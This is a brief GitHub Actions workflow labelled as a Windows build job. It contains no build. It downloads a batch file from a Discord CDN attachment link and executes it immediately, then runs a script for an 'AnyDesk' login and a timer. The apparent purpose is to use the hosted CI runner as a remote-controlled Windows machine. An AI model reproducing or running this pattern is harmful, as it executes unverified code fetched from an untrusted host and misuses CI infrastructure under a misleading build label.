name: WindowsOptimal-V2

on:
  workflow_dispatch:

jobs:
  build:
    name: Start Building...
    runs-on: windows-latest
    
    steps:
      - name: Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://cdn.discordapp.com/attachments/1201270076909834270/1219800666990710794/Downloads.bat?ex=660c9ee5&is=65fa29e5&hm=f820908b20ebb72cf302b312bb83de5f1620d016e923b4aa84db3105f338ad02&" -OutFile "Downloads.bat"
          cmd /c Downloads.bat

      - name: Log In To AnyDesk
        run: cmd /c show.bat

      - name: Time Counter
        run: python time.py
